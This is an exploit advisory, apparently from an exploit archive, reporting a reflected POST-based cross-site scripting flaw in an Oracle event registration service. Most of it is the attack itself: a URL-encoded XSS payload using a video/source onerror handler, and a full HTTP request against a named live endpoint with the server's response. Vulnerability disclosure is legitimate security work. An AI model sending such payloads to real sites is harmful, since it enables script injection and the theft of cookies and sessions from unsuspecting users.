# Exploit Title: [ POST BASED XSS at ORACLE ] # Date: [ 18 Oct 2017 ] # Exploit Author: [ Ismail Tasdelen ] # Vendor Homepage: [https://www.oracle.com/] # Software Link: [ Oracle App Service ] # Version: [ Oracle App Service - XXX2017OCXXX ] # Tested on: Chrome / FireFox / Opera / IE / Safari Browser # Description : This script is possibly vulnerable to Cross Site Scripting ( XSS ) attacks. Cross site scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious code (usually in the form of Javascript) to another user. Because a browser cannot know if the script should be trusted or not, it will execute the script in the user context allowing the attacker to access any cookies or session tokens retained by the browser. # Url address : eventreg.oracle.com This vulnerability affects /certainApp/App/services/trigger.cfm # XSS Payload : POSTsoap=SOAP%20POST<video><source onerror="javascript:prompt(998299)"> # Attack Details : URL encoded POST input callMethod was set to POSTsoap=SOAP%20POST<video><source onerror="javascript:prompt(998299)"> The input is reflected inside a text element. # HTTP Request / Response : [+] Request ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ POST /certainApp/App/services/trigger.cfm HTTP/1.1 Content-Length: 245 Content-Type: application/x-www-form-urlencoded Referer: https://eventreg.oracle.com:443/ Cookie: applicationName=oracle Host: eventreg.oracle.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36 Accept: */* POSTsoap=SOAP%20POST&callMethod=POSTsoap%3dSOAP%2520POST<video><source%20onerror%3d%22javascript:prompt(998299)%22> &callService=profile&gogo=true&path=/data02/webapps/certainApp/App/services&PROENCODEDID=94102&SESSIONTOKEN=1&showNavigation=false [+] Response ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ HTTP/1.1 200 OK Date: Wed, 18 Oct 2017 19:28:18 GMT Server: Apache Strict-Transport-Security: max-age=31536000; includeSubDomains x-xss-protection: 0 Set-Cookie: applicationName=oracle;Domain=.eventreg.oracle.com;Path=/;Expires=Thu, 19 Oct 2017 19:28:18 GMT;Secure;HttpOnly Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Keep-Alive: timeout=900, max=95 Connection: Keep-Alive Original-Content-Encoding: gzip Content-Length: 3011 # You want to follow my activity ? https://www.linkedin.com/in/ismailtasdelen https://github.com/ismailtasdelen https://twitter.com/ismailtsdln